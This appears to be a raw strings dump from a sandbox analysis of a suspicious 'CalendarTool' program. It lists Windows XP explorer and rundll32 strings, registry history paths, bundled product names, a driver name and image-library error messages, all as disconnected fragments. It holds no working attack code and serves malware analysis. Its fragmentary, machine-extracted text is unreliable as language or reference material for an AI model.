nusrmgr.cpl ,initialTask=ChangePicture
NewExeName
Windows
ediskeer.dll
timedate.cpl
Software\Microsoft\Windows\CurrentVersion\Explorer\Comdlg32\LastVisitedMRU
Software\Microsoft\Windows\CurrentVersion\Explorer\Comdlg32\OpenSaveMRU
Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU
Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Software\Microsoft\Internet Explorer\TypedURLs
%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\Calculator.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Games\Solitaire.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\Paint.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\WordPad.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\System Tools\Files and Settings Transfer Wizard.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\Windows Movie Maker.lnk
%USERPROFILE%\Start Menu\Programs\Accessories\Tour Windows XP.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Windows Messenger.lnk
%USERPROFILE%\Start Menu\Programs\Windows Media Player.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\MSN.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Get Online with MSN.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Get Going with Tablet PC.lnk
%ALLUSERSPROFILE%\Start Menu\Set Program Access and Defaults.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Windows Journal.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\Media Center\Media Center.lnk
%USERPROFILE%\Start Menu\Programs\Internet Explorer.lnk
Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
TSAppCMP.DLL
netapi32.dll
%SystemRoot%\system32\restore\rstrui.exe
RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL ?0x%X?%s
RunDLL32.EXE
%s%d%s
Software\Microsoft\Windows\CurrentVersion\Policies\System
settings.dll
explorer.exe "
explorer.exe /e, "
WindowsLogon
WindowsLogoff
%s %s
Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count
uAppWiz.Cpl
\explorer.exe
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu
::{20D04FE0-3AEA-1069-A2D8-08002B30309D}
taskmgr.exe
ShellExecute
Software\Microsoft\Windows\CurrentVersion\Explorer\AppKey\%d
\WindowsShell.Manifest
Get Online with MSN.lnk
Set Program Access and Defaults.lnk
Link%d
OEM%d
Software\Microsoft\Windows\CurrentVersion\SMDEn
::{D20EA4E1-3957-11d2-A40B-0C5020524152}
%WinDir%\Explorer.exe
There is a file or folder on your computer called "%s" which could cause certain applications to not function correctly. Renaming it to "%s" would solve this problem. Would you like to rename it now?
Ca&scade Windows
Tile Windows &Horizontally
Tile Windows V&ertically
&Windows Security...
&Help and Support
&Log Off %s...
Windows Explorer
6.00.2900.5512 (xpsp.080413-2105)
EXPLORER.EXE
Windows
Operating System
6.00.2900.5512
Keep the &taskbar on top of other windows
To remove records of recently accessed documents, programs, and Web sites, click Clear.
Windows displays icons for active and urgent notifications, and hides inactive ones. You can change this behavior for items in the list below.
Select this option to use the menu style from earlier versions of Windows.
6There is not enough memory to complete this operation.8Unable to run command.
The folder '%1' has been removed.WMy Computer or Windows Explorer has not been properly initialized yet. Try again later.
&Undo %s
Windows is running in safe mode.
This special diagnostic mode of Windows enables you to fix a problem which may be caused by your network or hardware settings. Make sure these settings are correct in Control Panel, and then try starting Windows again. While in safe mode, some of your devices may not be available.
startRThere was an internal error and one of the windows you were using has been closed.
Restrictions{This operation has been cancelled due to restrictions in effect on this computer. Please contact your system administrator.
&Show Open Windows
Windows was unable to change the display settings for the new configuration. Return the computer to the previous state, shut down Windows, and restart the computer in the desired configuration.
There may be a problem with your display settings if you continue. To safely change to a new configuration, you should shut down Windows and restart the computer in the desired configuration. Do you want to continue anyway?
This pre-release version of "Internet Explorer 4.0" Desktop/Explorer has expired. Please update to the latest release of "Internet Explorer 4.0" from WWW.MICROSOFT.COM
helpctr.exe>-FromStartHelp
Take a tour of Windows XP
NOpens a window where you can pick search options and work with search results.aOpens a central location for Help topics, tutorials, troubleshooting, and other support services.
/Opens a program, folder, document, or Web site.
Provides options for closing your programs and logging off, or for leaving your programs running and switching to another user.lProvides options for turning off or restarting your computer, or for activating Stand By or Hibernate modes.RDisconnects your session. You can reconnect to the session when you log on again.
&Windows Security
iOpens the My Documents folder, where you can store letters, reports, notes, and other kinds of documents./Displays recently opened documents and folders.KOpens the My Music folder, where you can store music and other audio files.]Opens the My Pictures folder, where you can store digital photos, images, and graphics files.zGives access to, and information about, the disk drives, cameras, scanners, and other hardware connected to your computer.MGives access to, and information about, folders and files on other computers.8Connects to other computers, networks, and the Internet.
rundll32.exe_1976:.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s
CalendarServ.exe_3180:.text
`.rdata
@.data
.rsrc
@.reloc
Product_CloudMgr_Public_Exe
Product_CloudMgr_Exe
Product_AppsRobo_Public_Exe
Product_AppsRobo_Exe
Product_Allinone_Public_Exe
Product_Allinone_Exe
Product_Newspark_Public_Exe
Product_Newspark_Exe
Product_Spark_Public_Exe
Product_Spark_Exe
Product_Ime_Public_Exe
Product_Ime_Exe
Product_AppStore_Public_Exe
Product_AppStore_Exe
Product_Pcf_Public_Exe
Product_Pcf_Exe
Product_Bav_Public_Exe
Product_Bav_Exe
ADVAPI32.DLL
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
D:\jenkins\workspace\calendar\Release\Service.pdb
SHLWAPI.dll
GetProcessHeap
KERNEL32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyW
RegEnumKeyW
ReportEventW
ADVAPI32.dll
SHELL32.dll
WTSAPI32.dll
USERENV.dll
VERSION.dll
GetCPInfo
GetConsoleOutputCP
RegCreateKeyExW
PSAPI.DLL
.?AV?$CSafeSingleton@VBugReportHelper@@@@
.?AVCHeapMemAlloc@BugReportHelper@@
.?AVBugReportHelper@@
2"2S2_2
1$1(1,1014181,2024282
@ntdll.dll
kernel32.dll
DumpConfig.ini
BugInfoUploadURL
BugURL
\StringFileInfo\x\%s
\StringFileInfo\X
KERNEL32.DLL
mscoree.dll
AEVPTask.dll
btguarduser.dll
Report.exe
InstallHelper.exe
DeskBandDLL.dll
btguard.sys
btguard64.sys
123.exe
Software\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}
rundll32.exe
, LogReport no
Kernel32.dll
explorer.exe
%s failed with %d
Calendar.exe
CrashReport.exe
CrashUL.exe
2.0.0.11189
dump.theadvancedcalendar.com
BugReportConfig.ini
BugReportConfig
5.1.2600.5512 (xpsp.080413-211
CalendarServ.exe
"%Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe"
%Program Files%\CalendarTool\2.0.0.11189
%Documents and Settings%\LocalService\Application Data\CalendarTool\dump
%Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe
2,0,0,11189
Calendar.exe_3428:.text
`.rdata
@.data
.rsrc
@.reloc
8%uEP3
>.uBV
tcHHtCHt.Ht
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
inflate 1.1.3 Copyright 1995-1998 Mark Adler
1.2.24
libjpeg error %d  from %s [%d %d]
sampler.begin
--- SkMatrix::setPolyToPoly count out of range %d
1.2.3
0123456789ABCDEFlibpng error: %s
libpng error: %s, offset=%d
libpng error no. %s: %s
libpng warning: %s
libpng warning no. %s: %s
NULL row buffer for row %ld, pass %d
iTXt chunk not supported.
Corrupt JPEG data: found marker 0xx instead of RST%d
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Inconsistent progression sequence for component %d coefficient %d
Unknown Adobe color transform code %d
Obtained XMS handle %u
Freed XMS handle %u
Unrecognized component IDs %d %d %d, assuming YCbCr
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
Opened temporary file %s
Closed temporary file %s
Ss=%d, Se=%d, Ah=%d, Al=%d
Component %d: dc=%d ac=%d
Start Of Scan: %d components
Component %d: %dhx%dv q=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Smoothing not supported with nonstandard sampling ratios
RST%d
At marker 0xx, recovery action %d
Selected %d colors for quantization
Quantizing to %d colors
Quantizing to %d = %d*%d*%d colors
%4u %4u %4u %4u %4u %4u %4u %4u
Unexpected marker 0xx
Miscellaneous marker 0xx, length %u
with %d x %d thumbnail image
JFIF extension marker: type 0xx, length %u
Warning: thumbnail image size does not match data length %u
JFIF APP0 marker: version %d.d, density %dx%d %d
= = = = = = = =
Obtained EMS handle %u
Freed EMS handle %u
Define Restart Interval %u
Define Quantization Table %d precision %d
Define Huffman Table 0xx
Define Arithmetic Table 0xx: 0xx
Unknown APP14 marker (not Adobe), length %u
Unknown APP0 marker (not JFIF), length %u
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unsupported marker type 0xx
Failed to create temporary file %s
Unsupported JPEG process: SOF type 0xx
Cannot quantize to more than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize more than %d color components
Insufficient memory (case %d)
Not a JPEG file: starts with 0xx 0xx
Quantization table 0xx was not defined
Huffman table 0xx was not defined
Backing store not supported
Cannot transcode due to multiple use of quantization table %d
Maximum supported image dimension is %u pixels
Empty JPEG image (DNL not supported)
Bogus DQT index %d
Bogus DHT index %d
Bogus DAC value 0x%x
Bogus DAC index %d
Unsupported color conversion request
Too many color components: %d, max %d
Buffer passed to JPEG library is too small
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Improper call to JPEG library in state %d
Invalid scan script at entry %d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Unsupported JPEG data precision %d
Invalid memory pool code %d
Wrong JPEG library version: library is %d, caller expects %d
IDCT output block size %d not supported
Invalid component ID %d in SOS
Bogus message code %d
?I got %f and %f as radii to SkPath::AddRoundRect, but negative radii are not allowed.
Unknown zTXt compression type %d
Incomplete compressed datastream in %s chunk
Data error in compressed datastream in %s chunk
Buffer error in compressed datastream in %s chunk
gamma = (%d/100000)
gx=%f, gy=%f, bx=%f, by=%f
wx=%f, wy=%f, rx=%f, ry=%f
incorrect gamma=(%d/100000)
Unknown compression type %d
zero length keyword
keyword length must be 1 - 79 characters
Zero length keyword
extra interior spaces removed from keyword
leading spaces removed from keyword
trailing spaces removed from keyword
invalid keyword character 0xX
Out of memory while procesing keyword
Empty keyword in tEXt chunk
Empty keyword in zTXt chunk
Empty keyword in iCCP chunk
Empty keyword in sPLT chunk
white_x=%f, white_y=%f
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
%ld%c
"@Skia Error: %s
Invalid Operation
inflate 1.2.3 Copyright 1995-2005 Mark Adler
====== typeface index %d
%s empty contour
?%s shouldn't get here if all four points are about equal
%s shouldn't get here if all four points are about equal
Sorry, you passed me a bitmap resize method I have never heard of: %d
?456789:;!"#$%&'()* ,-./0123
kernel32.dll
Product_CloudMgr_Public_Exe
Product_CloudMgr_Exe
Product_AppsRobo_Public_Exe
Product_AppsRobo_Exe
Product_Allinone_Public_Exe
Product_Allinone_Exe
Product_Newspark_Public_Exe
Product_Newspark_Exe
Product_Spark_Public_Exe
Product_Spark_Exe
Product_Ime_Public_Exe
Product_Ime_Exe
Product_AppStore_Public_Exe
Product_AppStore_Exe
Product_Pcf_Public_Exe
Product_Pcf_Exe
Product_Bav_Public_Exe
Product_Bav_Exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
?#%X.y
operator
GetProcessWindowStation
USER32.DLL
portuguese-brazilian
RegDeleteKeyExW
SYN.ACK
ACK.SYN

Summary

Dynamic Analysis

Removals

Static Analysis

Network Activity

Map

Strings from Dumps